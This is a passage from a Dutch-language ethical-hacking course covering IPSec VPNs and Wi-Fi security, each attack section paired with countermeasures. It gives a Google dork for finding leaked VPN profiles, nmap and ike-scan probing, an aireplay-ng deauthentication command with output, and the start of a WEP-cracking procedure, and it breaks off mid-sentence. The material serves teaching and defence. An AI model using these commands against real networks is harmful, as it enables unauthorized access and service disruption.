geëncrypteerd blijven tot ze hun bestemming bereikt hebben. Het zou zonde zijn dat je gegevens
77
gedecrypteerd ergens op het netwerk te vinden zijn, als jij ze toch geëncrypteerd heeft. Dit kan
gebeuren als je een proxy gebruikt die geen HTTPS ondersteunt.
Een protocol dat je kan gebruiken om vanop afstand in te loggen op een systeem, en dat hierbij
encryptie gebruikt, is Secure Shell (SSH).
IPSec en IKE zijn Internet standaarden die kunnen zorgen voor de authenticatie en voor het
encrypteren van netwerkverkeer.
6 Honeypot server Een Honeypot server is geen server om ergens binnen te breken, maar je kan deze server
gebruiken om je te verdedigen tegen aanvallen. Zo een soort server zal openstaan voor aanvallen, er
zal een besturingssysteem draaien, waarvan geweten is dat er kan bij binnengebroken worden. In
ditzelfde toestel bevinden zich wachtwoorden en gebruikersnamen. De hacker denkt dan dat zijn
hack succesvol is en zal geen argwaan hebben.
De verdediger heeft deze server per opzet geplaatst. Terwijl de hacker bezig is met aanvallen, heeft
deze Honeypot server veel gegevens over de hacker en over zijn werkwijze bijgehouden. Op deze
manier kunnen de hackers tegengehouden en gevat worden.
Bron: http://en.wikipedia.org/wiki/Honeypot_%28computing%29
78
79
Stap 5: Virtual Private Network 1 Inleiding Er zijn zeer veel bedrijven die toelaten dat hun medewerkers van op afstand werken op en naast de
systemen die in de onderneming staan. Eén van de voorwaarden hiervan is dat de gegevens veilig bij
de onderneming geraken. Om hiervoor te zorgen, gebruiken veel ondernemingen een Virtual Private
Network.
2 Virtual Private Network (VPN) Een Virtual Private Network (VPN) is een privaat netwerk. Dit wordt gebruikt als er een medewerker
van thuis wilt werken op de toestellen die op het netwerk in het bedrijf staan. Je kan dit ook doen
zonder VPN, maar dan zijn je gegevens niet beveiligd. Een VPN maakt een tunnel van bij een
gebruiker naar een bedrijf. Deze tunnel zal gebruikt worden om gegevens veilig van bij een
medewerker tot bij een bedrijf te brengen.
Als een bedrijf twee vestigingen heeft, kan je ook een VPN opstellen tussen beide instellingen zodat
ze virtueel in hetzelfde netwerk zitten.
Er zijn vier grote voordelen om voor een VPN te kiezen:
Confidentialiteit: dit wil zeggen dat de pakketten geëncrypteerd zijn. Enkel de
mensen/toestellen die je vertrouwt, zullen je pakket goed kunnen lezen omdat zij een “key”
hebben om het pakket de decrypteren. Als iemand je verbinding zou afluisteren, zouden ze
niets kunnen doen met de gegevens omdat ze geëncrypteerd zijn.
Data integriteit: als je een bestand doorstuurt zou het kunnen dat iemand onderweg je
pakket aangepast heeft waardoor de data veranderd zijn. Als je met gevoelige gegevens
werkt, is het noodzakelijk dit tegen te gaan.
o Wanneer de VPN opgesteld wordt zal de hash doorgestuurd worden zodat zowel de
ontvanger als de verstuurder de hash hebben. Een hash is een algoritme dat de VPN
zal uitvoeren op de pakketten. Dit zal gebeuren, zowel bij de verstuurder als bij de
ontvanger. De verstuurder zal bij het versturen van een pakket de hash uitvoeren, hij
zal hierbij een code verkrijgen. De ontvanger zal diezelfde hash uitvoeren op de
pakketten die hij ontvangen heeft. Als de code die de ontvanger heeft bekomen
dezelfde code is als de code die in het pakket aanwezig is, dan weet de ontvanger dat
de integriteit van de data behouden is.
o De manieren die je kan gebruiken om te een hash toe te passen zijn:
Message Digest 5 (MD5)
Secure Hash Algorithm 1 (SHA-1)
Secure Hash Algoritm 2 (SHA-2)
Authenticatie: bij een VPN is het de bedoeling dat niet iedereen een VPN kan opstellen naar
je bedrijf, maar enkel de mensen die hiervoor bevoegd zijn. De verschillende methodes die
gebruikt kunnen worden in een VPN zijn:
o pre-shared keys
o public en pricate key pairs
o gebruiker authenticatie
Antireplay: als een aanvaller je VPN verkeer afluistert en veinst dat hij de persoon is
waarmee al een VPN lopende is, zal dit niet lukken. Een hacker zal dit proberen te doen door
80
het pakket dat hij afgeluisterd heeft, terug te sturen naar het toestel waarvan de VPN
lopende is. Dit zal hij niet kunnen doen, omdat elk pakket dat gebruikt is geweest in de VPN
sessie niet meer toegelaten is in het netwerk.
In het kort:
Doel Methode
Confidentialiteit Encryptie
Data integriteit Hashing
Authenticatie Pre-shared keys, public/private key pair
Antireplay Geïntegreerd in IPSec, serienummers toevoegen aan de pakketten en geen pakket met hetzelfde serienummer toelaten.
Bron: CCNA Security 640-554 Official Cert Guide
2.1 De tot stand komst van een IPSec VPN Een IPSec VPN is een type VPN dat laag 3 van het OSI-model gebruikt, de netwerk-laag. Een IPSec
VPN zal twee fases gebruiken om tot een beveiligde verbinding te komen. Deze fases zijn:
Internet Key Exchange Fase 1 (IKE Fase 1)
o Main mode
o Agressive mode
Internet Key Exchange Fase 2 (IKE Fase 2)
2.1.1 Internet Key Exchange Fase 1 (IKE Fase 1) De IKE Fase 1 tunnel is een tunnel die zal gebruikt worden om het management voor de VPN te
beveiligen. Er moet over 5 zaken genegotieerd worden tussen de initiator en de responder:
Het Hash Algoritme: Message Digest 5 Algoritme (MD5) of Secure Hash Algoritme (SHA)
Het Encryptie Algoritme: Digital Encryption Standard (DES), Triple DES (3DES) of Advanced
Encryption Standard (AES)
De Diffie-Hellman group: dit is het uitwisselen van een geheime encryptiesleutel om daarna
communicatie tussen de initiator en de responder te versleutelen.
De Authenticatiemethode: dit wordt gebruikt om de identiteit van de initiator en de
responder te controleren. Dit kan gebeuren met Pre Shared keys of een Public-Private key
pair (RSA)
Lifetime: hier wordt besproken hoe lang de VPN open blijft staan, als er geen verkeer over
komt. Het veiligste is om dit korter te maken dan één dag. Als dit niet overeenkomt tussen de
initiator of de responder is dit niet erg. De tunnel zal toch werken met de kortst ingestelde
tijd.
Als je van elk van deze zaken beslist hebt welke je zal gebruiken, heb je de keuze tussen twee modes
om deze tunnel op te zetten. Je kan kiezen voor “Main mode” ofwel “Agressive mode”.
81
2.1.1.1 Main mode
Deze mode wordt het meeste gebruikt om een VPN op te stellen omdat deze het veiligste is. Deze
main mode bestaat uit drie verschillende stappen.
eerst beslissen de initiator en responder welke algoritmen en hashes gebruikt worden om de
communicatie in de IKE tunnel te beveiligen.
ten tweede zal er een Diffie-Hellman public key uitgewisseld worden voor het genereren van
gedeelde geheime keys. Er zullen ook nonces uitgewisseld worden, om de identiteit van de
deelnemers te bevestigen.
ten derde zal de identiteit van beide gecontroleerd worden door naar het geëncrypteerd IP-
adres te kijken.
2.1.1.2 Agressive Mode
Deze methode is minder veilig, omdat er minder controle is bij het opstarten van deze tunnel. Deze
methode is wel sneller, want er worden minder pakketten verstuurd. Een nadeel aan de agressive
mode is dat er gegevens uitgewisseld zijn voor de tunnel opgestart is. Die gegevens zijn dus niet
geëncrypteerd en kunnen afgeluisterd worden. Deze agressive mode bestaat uit 2 stappen:
eerst beslissen de initiator en responder welke algoritmen, hashes, Diffie-Hellman public key
en welke nonces gebruikt worden om de communicatie in de IKE tunnel te beveiligen
ten tweede zal de initiator de identiteit van de responder controleren. Als dit in orde is,
wordt de tunnel opgezet
2.1.2 Internet Key Exchange Fase 2 (IKE Fase 2) In de IKE fase 2 zal er een tunnel opgezet worden om de eigenlijke data van de gebruikers te
encrypteren. Dit zal gebeuren met de hulp van de IKE fase 1. IKE fase 2 heeft één mode, deze mode is
de “Quick mode”
2.1.2.1 Quick mode
De “Quick mode” is de mode die zal gebruikt worden om de eigenlijke VPN tunnel op te starten
waardoor de gegevens van de gebruiker zullen lopen. Deze mode bestaat uit 3 stappen:
eerst beslissen de initiator en responder welke algoritmen en hashes gebruikt worden om de
communicatie in de IKE tunnel te beveiligen. Dit zal gebeuren in de al gemaakte tunnel door
de IKE fase 1 waardoor alles geëncrypteerd is
ten tweede zullen de overeengekomen algoritmen en hashes in werking treden in de volledig
beveiligde tunnel, omdat ze al beveiligd zijn door de IKE fase 1
Als alles overeengekomen is, dan zal een IPSec Security Association ontstaan. Dit is een verzameling
van encryptiemethodes en keys die gebruikt zullen worden om je gegevens over te brengen. De
afbeelding hieronder geeft een duidelijke blik op de IPSec tunnel.
82
Tabel 2-1 IPSec tunnel
Bronnen:
https://sc1.checkpoint.com/documents/R77/CP_R77_VPN_AdminGuide/13847.htm
https://supportforums.cisco.com/docs/DOC-8125,
http://en.wikipedia.org/wiki/IPsec#Security_association,
http://en.wikipedia.org/wiki/Internet_Security_Association_and_Key_Management_Protocol,
http://cisco-vpn.org.ua/1587051044/ch08lev1sec1.html,
http://nl.wikipedia.org/wiki/Diffie-Hellman-sleuteluitwisselingsprotocol
2.2 Site-to-site VPN Een site-to-site VPN is een VPN dat je kan gebruiken om een tunnel te maken tussen twee
vestigingen van een bedrijf. Het netwerk zal er dan virtueel uitzien als één netwerk, waardoor de
twee vestigingen naadloos met elkaar kunnen communiceren.
2.3 Client-to-site VPN Bij een client-to-site VPN zal je een VPN opstellen van één enkele gebruiker naar een
bedrijfsnetwerk. Dit is een goede keuze als je medewerker wil werken via een openbaar onbeveiligd
draadloos netwerk, bijvoorbeeld op luchthavens en andere. In dit geval kan hij gebruikmaken van
software zoals een Cisco VPN client die de IPSec tunnel zal opstellen voor de gebruiker. Hij kan in dit
geval ook gebruik maken van een SSL VPN.
2.4 Google hacking voor VPN Zoals al bewezen in “Stap 1 – Footprinting” is het gebruik van Google gemakkelijk, om snel toestellen
te vinden waar gevoelige informatie opstaan. Om profiel gegevens te vinden die gebruikt worden bij
een VPN kan je naar bestanden zoeken met het bestandstype pcf. Als je bijvoorbeeld wilt zoeken
naar de VPN die gebruikt wordt door elec0ne, kan je de volgende zoekopdracht intypen:
filetype:pcf site:elec0ne.com. Als je hiermee een bestand vindt, staan daar geëncrypteerde
gegevens in. Als je dit pcf bestand gedownload hebt, kan je dit importeren in een Cisco VPN Client
waarna je connectie kan maken met de VPN. Hierdoor zit je dus op het netwerk en kan je andere
aanvallen uitvoeren op het netwerk.
83
2.4.1 Google hacking voor VPN Tegenmaatregel Normaalgezien zouden de pcf bestanden niet zomaar mogen te vinden zijn op het internet.
Bij sommige bedrijven is dit wel het geval, het gaat dan om mensen die een VPN willen opstarten
maar eigenlijk niet goed weten waarmee ze bezig zijn.
2.5 Probing IPSec VPN Servers Om na te gaan of er een VPN server aanwezig is op het netwerk, kan je zoeken naar UDP poort 500 in
het netwerk. Je kan dit doen met de tool Nmap. Het kan zijn dat je hierdoor geen resultaat bekomt.
Dit komt omdat, als je een VPN opstelt, je ervoor kan kiezen dat deze onzichtbaar is als er een scan
uitgevoerd wordt op poort 500.
Commando:
nmap -sU -p 500 192.168.1.1
Resultaat :
Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-16 11:08 CET
Nmap scan report for 192.168.1.1
Host is up (0.00062s latency).
PORT STATE SERVICE
500/udp open isakmp
MAC Address: 44:03:A7:AA:02:E0 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds
Er kan voor gezorgd worden dat Nmap niet het gewenste resultaat bekomt en daarom kan je nog een
gedetailleerdere scan uitvoeren.
Om een gedetailleerde scan uit te voeren kan je de volgende tool downloaden: ike-scan van NTA-
Monitor (www.nta-monitor.com/tools/ike-scan).
Met deze tool zal je ook veel meer te weten komen over de VPN dan alleen maar of er een VPN
aanwezig is.
Commando:
ike-scan 192.168.1.1
Resultaat:
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-
scan/)
192.168.1.1 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-
R=0e803d2b90649737)
Ending ike-scan 1.9: 1 hosts scanned in 0.014 seconds (72.26 hosts/sec). 0
returned handshake; 1 returned notify
2.5.1 Probing IPSec VPN Servers Tegenmaatregel Je kan weinig doen om tegen te gaan dat er ontdekt wordt dat er een VPN aanwezig. Je kan
bij een site-to-site VPN wel enkel aan de IP-adressen die je vertrouwt de mogelijkheid geven om te
connecteren met de VPN. Maar als er gewerkt wordt met een site-to-site VPN is het niet mogelijk om
dit te vermijden, omdat men meestal vanaf een andere plaats, dus met een ander IP-adres, naar de
VPN server zal gaan.
84
2.6 Attacking IKE Aggressive Mode Bij de IKE aggressive mode is er een manier om binnen te breken in een tunnel. En dit omdat de
gegevens bij de IKE fase 1 afgeluisterd kunnen worden. Eerst en vooral moet je te weten komen of de
VPN die je wilt aanvallen een aggressive mode aanvaart.
De tool die hiervoor gemaakt is: IKEProbe van Cipherica Labs
(www.ernw.de/download/ikeprobe.zip)
Als je weet dat de VPN die je wilt aanvallen een aggressive mode ondersteunt, kan je een perl script
laten werken die dan zal proberen binnen te breken in de VPN.
2.6.1 Attacking IKE Aggressive Mode Tegenmaatregel Het beste wat je kan doen om dit soort aanvallen tegen te houden is het gebruik van een
aggressive mode niet toe te laten op je VPN.
85
Stap 6: Wireless Hacking 1 Inleiding In een bedrijfsomgeving wordt een draadloos netwerk meer om meer gebruikt, omdat het
gemakkelijk is als er gasten zijn die hun eigen toestellen meenemen. Dit geldt niet alleen voor gasten,
in vele bedrijven wordt er gedaan aan BYOD, dit is de term voor “Bring Your Own Device”. Als hun
eigen toestel dan een tablet is, dan is er geen andere keuze dan te kiezen voor een draadloze
oplossing voor het netwerk.
Een draadloos netwerk is altijd het punt in het netwerk dat het moeilijkste te beveiligen is. Als je
draadloos netwerk tot buiten de fysieke grenzen van je onderneming gaat, heb je zelfs al niet meer
de sociale controle of moet de aanvaller zelfs geen toegang krijgen tot je gebouw, maar kan hij van
buiten je gebouw proberen toegang te krijgen tot je draadloos netwerk.
Er bestaan verschillende manieren om je draadloos netwerk te beschermen, maar bij vele van deze
manieren is het mogelijk om de beveiligingscodes te kraken en zo een weg naar binnen te vinden.
2 Achtergrond Draadloze communicatie bestaat al lang. In de eerste wereldoorlog is deze veel gebruikt geweest.
Om veiligheidsredenen beperkten ze het gebruik van draadloze communicatie, en mocht het alleen
gebruikt worden voor militaire doeleinden.
Het is pas in het jaar 1997 dat het draadloze Local Area Network (LAN) ontstaan is. Deze standaard is
uitgebracht door “The Institute of Electrical and Electronics Engineers” (IEEE). De standaard kreeg de
naam 802.11 of Wi-Fi. Elke keer als er een nieuwe versie van deze standaard uitgebracht wordt,
wordt dit nummer aangepast.
Bron: http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htmFrequenties
3 Channels en frequenties De 802.11 standaard werkt met verschillende frequenties en channels. De frequenties die gebruikt
worden voor een Wi-Fi netwerk zijn 2.4 GHz en 5.8 GHz. Het hangt af van de versie van de standaard
op welke frequentie het Wi-Fi netwerk zal werken. Het hangt van de frequentie af welke channels
mogelijk zijn en welke snelheid er mogelijk is binnen het draadloos netwerk.
Hieronder bevindt zich een tabel met de mogelijke Wi-Fi versies met hun frequentie en mogelijke
bandbreedte. Er zijn veel factoren die de bandbreedte kunnen beïnvloeden. Hoe hoger de
frequentie, hoe minder ver het draadloos netwerk zal reiken en hoe hoger de bandbreedte is.
Wi-Fi versie Jaar van productie Frequentie Bandbreedte
802.11 1997 2.4 GHz 2 Mbps
802.11b 1999 2.4 GHz 11 Mbps
802.11a 1999 5 GHz 54 Mbps
802.11g 2003 2.4 GHz 54 Mbps
802.11n 2007 2.4 GHz, 5 GHz 100 Mbps
802.11ac 2014 5 GHz 500 Mbps Tabel 3-1 Wi-Fi versie en Frequentie
86
Bij een draadloos netwerk is het mogelijk dat verschillende channels overlappen waardoor deze
elkaar verstoren. Hierdoor kan het dat je Wi-Fi soms wegvalt of dat je bandbreedte heel hard
afneemt. Dit is een probleem bij appartementsgebouwen waar veel draadloze netwerken aanwezig
zijn. Hieronder bevindt zich een overzicht van de verschillende mogelijke channels bij een 2.4 GHz
draadloos netwerk.
Tabel 3-2 Channels met overlapping
In een 5 GHz netwerk bestaat er geen overlapping. De channels die hier kunnen gebruikt worden zijn
van channel 36 tot channel 140. In een 5Ghz netwerk is er geen overlapping mogelijk.
Bron: https://discussions.apple.com/thread/2632171,
http://compnetworking.about.com/cs/wireless80211/a/aa80211standard.htm
4 Verschillende types Wi-Fi Er zijn verschillende manieren om een draadloos netwerk te maken, ad-hoc en infrastructure.
4.1 Ad-hoc Bij een ad-hoc netwerk zal er gebruik gemaakt worden van een peer-to-peer manier, dus zonder
gebruik te maken van een acces point.
4.2 Infrastructure Infrastructure netwerken hebben een acces point nodig om connectie mee te maken, de acces point
is dan aangesloten aan het bedraad netwerk. Deze soort draadloze netwerken zijn de meest
voorkomende, we zullen deze netwerken dus uitgebreid bespreken.
Als je wil connectie maken met een draadloos netwerk, moet je de Service Set Identifier (SSID) te
weten komen. Dit kan je via twee manieren doen:
Je kan luisteren naar beacons, in die beacons is de SSID in vermeld. Deze beacons worden
uitgestuurd door de access point.
Je kan ook een probe request sturen zonder specifieke SSID waardoor al de SSID’s zullen
reageren met een probe response.
87
Als je de SSID weet zal je een probe request uitsturen (dit is een broadcast), hij zal dit op elke
channel apart doen. Dit zal hij doen totdat hij het draadloos netwerk gevonden heeft dat hij op
voorhand geconfigureerd heeft. Dit komt hij te weten als hij een probe response terugkrijgt van
de acces point. Hierna zal de client aan authentication request sturen en, als hij een
authentication response terugkrijgt van de acces point is, hij verbonden met het netwerk.
We zijn ervan uitgegaan dat er geen vorm van beveiliging aanwezig is in het netwerk.
5 Manieren om een draadloos netwerk te beveiligen Er zijn verschillende manieren om een draadloos netwerk te beveiligen. Dit gaat vanaf enkel
vertrouwde toestellen binnen te laten in het netwerk, tot de encryptie die op het netwerk
plaatsvindt.
5.1 Basis methodes De volgende methodes zijn basis methodes om een draadloos netwerk te beveiligen. De volgende
methodes zijn gemakkelijk te omzeilen maar zullen leken weerhouden om connectie te maken met je
draadloos netwerk.
5.1.1 MAC filtering Een access point heeft de mogelijkheid om aan MAC filtering te doen. Dit wil zeggen dat de access
point tijdens de authenticatie fase zal kijken naar het MAC-adres en als deze niet in een voor
geconfigureerde lijst voorkomt, dan zal hij geen toegang krijgen tot het draadloos netwerk.
5.1.2 Verborgen draadloze netwerken Het is mogelijk om je access point zo te configureren dat als hij een beacon uitzendt hier de SSID niet
in zit. Dit maakt het moeilijker voor een aanvaller om te verbinding te maken met het netwerk,
omdat hij de SSID nodig heeft om verbinding te maken met het netwerk.
5.1.3 Antwoorden op probe requests Clients kunnen probe requests uitsturen zonder een SSID, waardoor ze van elk draadloos netwerk
dat zich in de buurt bevindt antwoord krijgt. Om ervoor te zorgen dat je draadloos netwerk hier niet
bijzit kan je je acces point zo configureren dat hij al de probe requests zonder SSID zal negeren. In
een bedrijfsomgeving is het aangeraden al de toestellen zo te configureren dat ze de SSID al weten.
Als je gasten krijgt kan je hier de SSID aan vertellen. Hiermee zorg je ervoor dat mensen waarvan je
niet wil dat ze de SSID te weten komen er moeilijker aan geraken.
88
5.2 Authenticatie Er is een groot verschil tussen authenticatie en encryptie. Bij authenticatie zal je toegang krijgen tot
het netwerk, er zal dan ook een sessie key aangemaakt worden, die gebruikt zal worden bij het
encryptie proces. De encryptie en authenticatie zullen beide gebeuren nog voordat het toestel dat
verbinding wil maken met het netwerk een IP-adres krijgt. Voor de authenticatie wordt er Wi-Fi
Protected Access (WPA) gebruikt. Er zijn twee soorten WPA: WPA Pre-Shared Key en WPA Enterprise.
WPA Pre-Shared Key (WPA-PSK): een key zal gebruikt worden bij de connectie met het
draadloos netwerk. Deze key is gekend bij de access point en bij al de clients in het draadloos
netwerk. Het is dezelfde key die zal gebruikt worden bij al de clients. Deze WPA key wordt in
een cryptografische functie gebruikt om encryptie keys te maken. Hiermee zal de sessie
beveiligd worden.
WPA Enterprise: de access point zal de authenticatie laten gebeuren door een RADIUS
server. Hierdoor kunnen vele soorten authenticatie gebruikt worden, waardoor je de manier
van authenticatie kan aanpassen aan de situatie. Je kan het extensible authentication
protocol (EAP) gebruiken die vele authenticatie mechanismen ondersteunt zoals EAP-TTLE,
PEAP en EAP-FAST.
Bij beide WPA-PSK en WPA Enterprise zal er een “four-way” handshake plaatsvinden om twee
encryptie keys aan te maken:
een pairwise transient key (PTK) die zal gebruikt worden voor de unicast communicatie
een group temporal key (GTK) die zal gebruikt worden voor mulitcast en broadcast
communicatie
5.2.1 WPA four-way handshake Bij WPA zal er een four-way handshake plaatsvinden omdat de Pairwise Master Key (PMK) het best
niet al te veel bekendgemaakt wordt. Er zullen dus andere keys gemaakt worden, een pairwise
transient key (PTK) die zal gebruikt worden voor de unicast communicatie en een group temporal key
(GTK) die zal gebruikt worden voor mulitcast en broadcast communicatie.
De afbeelding hieronder geeft meer informatie over hoe deze four-way handshake tot stand komt.
De STA is de client station.
Tabel 5-1 Four-way-handshake
89
De verschillende stappen zijn:
De access point (AP) zendt een nonce naar de STA (ANonce). De client heeft nu al de
gegevens om een PTK aan te maken. Dit zal hij doen door de gegevens die hij gekregen heeft,
te combineren met de PMK die hij bekomen heeft bij de authenticatie.
De STA zal dan zijn eigen nonce (SNonce) doorsturen met een MIC naar de AP. Een MIC is
een Message Authentication and Integrity Code. Deze zal dus de authenticatie en de
integriteit nakijken.
De Accespoint zal dan op zijn beurt de PTK maken.
De Accespoint zal dan de GTK naar de STA sturen met daarbij een sequentienummer en een
MIC. Dit sequentienummer zal de AP gebruiken bij het volgende multicast of
broadcastpakket om zo basis replay detectie te doen.
De STA zal dan als laatste een confirmatie sturen naar de AP.
bron: http://en.wikipedia.org/wiki/IEEE_802.11i-2004
5.3 Encryptie Encryptie zal gebeuren op laag 2 van het OSI model waardoor de IP-adressen, MAC-adressen, probes
en beacons niet geëncrypteerd worden. De data die via het draadloos netwerk naar een bedraad
netwerk gaan, zal gedecrypteerd worden als het naar het bedraad netwerk gaat. Dit decrypteren
heeft geen effect op het gebruik van een encryptie op een hogere laag van het OSI model, zoals
HTTPS.
Er zijn drie mogelijkheden om draadloos verkeer te encrypteren:
Wired Equivalent Privacy (WEP): WEP is de voorloper van WPA met één groot verschil, dat
WEP geen authenticatie fase heeft. Bij WEP weet elke deelnemer in het netwerk de
encryptiesleutel waardoor het niet veilig is. Er zijn ook manieren om een WEP key te kraken
waardoor het niet veilig is en waardoor je het beter niet meer gebruikt.
Temporal Key Integrity Protocol (TKIP): TKIP is een protocol dat ingevoerd is om WEP te
vervangen, er is geen andere hardware voor nodig. Alles wat WEP ondersteunt, ondersteunt
ook TKIP. Bij TKIP zal er een andere encryptie key gebruikt bij elke andere deelnemer in het
netwerk. Er zal ook een integriteitcontrole gedaan worden, dit wil zeggen dat pakketten
waarvan de sequentienummer niet op elkaar opvolgen niet zal toegelaten worden. Er zal bij
TKIP ook een hash uitgevoerd worden per pakket. Meer informatie over hashing is te vinden
in “Stap 5: Remote connectivity”.
Advanced Encryption Standard – Counter Mode with Cipher Block Chaning Message
Authentication Code Protocol (AES-CCMP): AES-CCMP is een totaal andere en veel betere
manier voor encryptie. Hier zal rekenig gehouden worden met data-integriteit en
confidentialiteit.
90
6 Discovery en monitoren Om netwerk discovery te doen bestaan er tools die probe requests en probe responses zullen
nakijken, om zo draadloze netwerken te vinden. Aangezien de IP-adressen niet geëncrypteerd zijn,
kan dit soort tool ook nagaan van waar naar waar op het netwerk veel verkeer is. Er zijn twee
soorten van discovery:
active discovery
passive discovery
6.1 Active Discovery Bij active discovery zullen er probe request uitgestuurd worden zonder SSID en gewacht worden
totdat er acces points iets terugsturen. Dit zal soms niet werken, omdat de access points zo ingesteld
kunnen worden dat ze dit soort requests negeren.
6.2 Active Discovery Tegenmaatregels Omdat het bij active discovery nodig is om met probe requests te werken, kan je dit soort van
broadcast uitzetten aan de access point.
6.3 Passive Discovery Passive discovery is de soort van discovery die het meeste gebruikt wordt. Dit soort van discovery zal
elk kanaal afgaan en luisteren naar de data die voorbijkomen om er zo achter het BSSID’s (mac adres
van acces point) te komen. De tool zal dan de SSID identificeren als ongekend. Als er een client
verbinding maakt met het netwerk moet deze de SSID meesturen. Dus als dit gebeurt zal je de SSID
te weten komen. Passive discovery kan je niet nagaan, dus dit is de beste manier voor de aanvaller
die niet gekend wilt zijn.
6.4 Passive Discovery Tegenmaatregels Er is niet echt iets wat je kan doen tegen passive discovery. Wat je kan doen is nagaan dat je
draadloos signaal niet buiten de fysieke afbakening van je bedrijf komt. Je kan dit doen door de
sterkte van het signaal dat uit de access point komt te verminderen.
6.5 Discovery tools Er zijn zeer veel discovery tools, maar er zijn twee linux tools die zeer goed zijn:
Kismet
airodumt-ng
Er zijn veel mensen die deze tools gebruiken om zo al de acces points in kaart te brengen, dit gebeurt
op vele verschillende manieren, te voet, via boot, te fiets, te auto en zelf via drones met een
ingebouwde Wi-Fi antenne en GPS antenne. De gegevens zijn terug te vinden op www.wigle.net.
91
6.5.1 Kismet Kismet is een robuuste tool die alsmaar beter wordt met de tijd. Deze tool heeft een ingebouwde
GPS functie en laat zelf interactie toe met de muis, wat niet vaak gebeurt bij Linux tools. Kismet kan
je downloaden via www.kismetwireless.net.
Commando:
kismet
Resultaat:
6.5.2 Airodump-ng Airodump-ng is een tool die te vinden is bij de veelgebruikte wireless hacking toolset aircrack-ng die
te vinden is via www.aircrack-ng.org. Deze suite bevat zo goed als elke draadloze hacking tool en
deze suite wordt goed onderhouden. Bij deze tool moet je eerst je draadloze adapter in monitor
mode brengen.
Commando:
airmon-ng start wlan0
Resultaat:
Interface Chipset Driver
wlan0 Intel 1030 iwlwifi - [phy0]
(monitor mode enabled on mon0)
Nu de monitor mode gestart is kan men airodump-ng starten. Met de monitor mode aan te zetten is
er een nieuwe interface gemaakt, deze interface is (mon0). Nu kunnen we airodump-ng starten.
92
Airodump-ng zal luisteren naar al de mogelijke draadloze acces points, door te hoppen tussen de
mogelijke 2.4 GHz channels en al de data hierop te observeren.
Commando:
airodump-ng mon0
Resultaat:
CH 5 ][ BAT: 2 hours 50 mins ][ Elapsed: 16 s ][ 2014-01-14 11:07
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
42:D9:98:60:C3:BC -70 43 0 0 6 54e. WEP WEP testnetwerk
BSSID STATION PWR Rate Lost Frames Probe
7 Denial of service attack Bij de 802.11 standaard is er eigenlijk al een ingebouwde DOS aanval. In sommige gevallen is het
nodig om de client te de-authentiseren, in het geval van foute encryptie keys, overloading, enz…
7.1 De-authenticatie aanval Bij een de-authenticatie aanval zullen er de-authenticatie frames nagemaakt worden en verstuurd
worden naar de clients alsof ze van de AP komen. En omgekeerd, zodat de AP denkt dat de client de
verbinding wil verbreken en dat de client hetzelfde denkt van de AP.
7.1.1 airplay-ng Airplay-ng is een tool die veel functionaliteiten heeft, waaronder de mogelijkheid bestaat om een de-
authenticatie aanval uit te voeren. Deze tool zal bij elke aanval 64 de-authenticatie frames uitsturen
naar de AP en 64 de-authenticatie frames naar de client.
Eerst zal je de adapter op monitor mode moeten zetten en de channel kiezen.
Commando: iwconfig mon0 channel 1
Na het vorige commando kan je de aanval starten.
Commando: aireplay-ng --deauth 2 -a 42:D9:98:60:C3:BC -c CC:08:E0:20:F8:74 mon0
Resultaat:
22:09:26 Waiting for beacon frame (BSSID: 42:D9:98:60:C3:BC) on channel 6
22:09:27 Sending 64 directed DeAuth. STMAC: [CC:08:E0:20:F8:74] [40|65
ACKs]
22:09:27 Sending 64 directed DeAuth. STMAC: [CC:08:E0:20:F8:74] [18|63
ACKs]
93
8 Encryptie aanval Een encryptie aanval komt tot stand wanneer er een kwetsbaarheid ontdekt wordt in de methode
die gebruikt wordt om te authentiseren. Bij WPA is de authenticatiemethode Tkip of AES-CCMP, dus
als er bij één van deze protocollen een kwetsbaarheid ontdekt wordt dan kan je deze gebruiken om
de key te kraken. WPA is een encryptiemethode waarbij de encryptiesleutels roteren in het netwerk,
waardoor het moeilijker wordt om de key te kraken. Bij WEP is het simpel om een encryptieaanval te
doen, omdat hier geen authenticatie-fase of key-rotatie plaatsvindt. Dus als je in een WEP-netwerk
de key gekraakt hebt, dan kan je als een betrouwde gebruiker het netwerk betreden en andere
mensen hun pakketten decrypteren zonder dat iemand dit zal te weten komen.
8.1 WEP Er zijn vele manieren ontdekt om een WEP encryptie methode te kraken. De twee meest gebruikte
zullen besproken worden:
Passieve aanval
ARP replay aanval
8.1.1 Achtergrond bij WEP encryptie Als je data over een draadloos netwerk stuurt dat beveiligd is door WEP, dan zal er een soort van
encryptie plaatsvinden. Deze encryptie wordt gedaan door gebruik te maken van de WEP key en een
Initialization Vector (IV). Deze IV is 24 bits groot, wordt random gegenereerd en wordt bijgevoegd
aan het einde van een 802.11 header. De IV en de WEP key worden gebruikt om een keystream te
maken. Deze keystream zal dan gebruikt worden om de pakketten te encrypteren.
Om de pakketten de decrypteren, zal de ontvangende kant de IV uit het pakket halen. Met die IV en
WEP-key zal dan weer een keystream aangemaakt worden. Met deze keystream kunnen de
pakketten gedecrypteerd worden.
De IV heeft maar een grootte van 24bits waardoor er dubbele IV’s op het netwerk kunnen zijn. Als er
een dubbele IV gevonden wordt op het netwerk, dan wordt de geencrypteerde tekt van de twee
frames vergeleken met elkaar om zo de keystream te ontdekken.
De keystream kan ook geraden worden door een groot aantal frames van een bepaald type te
verzamelen. Omdat ARP pakketten niet zo verschillend zijn van elkaar en omdat ze klein zijn, zijn dit
de pakketten die het meeste gebruikt zullen worden. Hoe meer frames je bijhoudt, hoe meer kans je
hebt om de keystream te ontdekken.
Aan de hand van de keystream en de gecollecteerde IV’s, kan de WEP key geraden worden.
8.1.2 Passieve aanval Bij een passieve aanval zal je je 802.11 capturing tool gebruiken om zoveel mogelijk data frames te
collecteren. Vroeger zou je ongeveer 1 miljoen frames nodig gehad hebben om een 104-bit WEP-key
te kraken. Met de tools van tegenwoordig is dit nog maar om en bij de 60 000. De tool die we
hiervoor zullen gebruiken is aurodump-ng. Om daarna de keystream en WEP-key te vinden, maken
we gebruik van aircrack-ng.
94
8.1.2.1 Airodump-ng
Commando om WEP-frames bij te houden:
airodump-ng –channel 1 –write wepdata mon0
Uitleg bij commando:
Je moet de channel waarop je netwerk zich bevindt meegeven. Om achteraf de data te laten
analyseren laat je al je frames in een bestand steken dat begint met wepdata. Je geeft de monitor
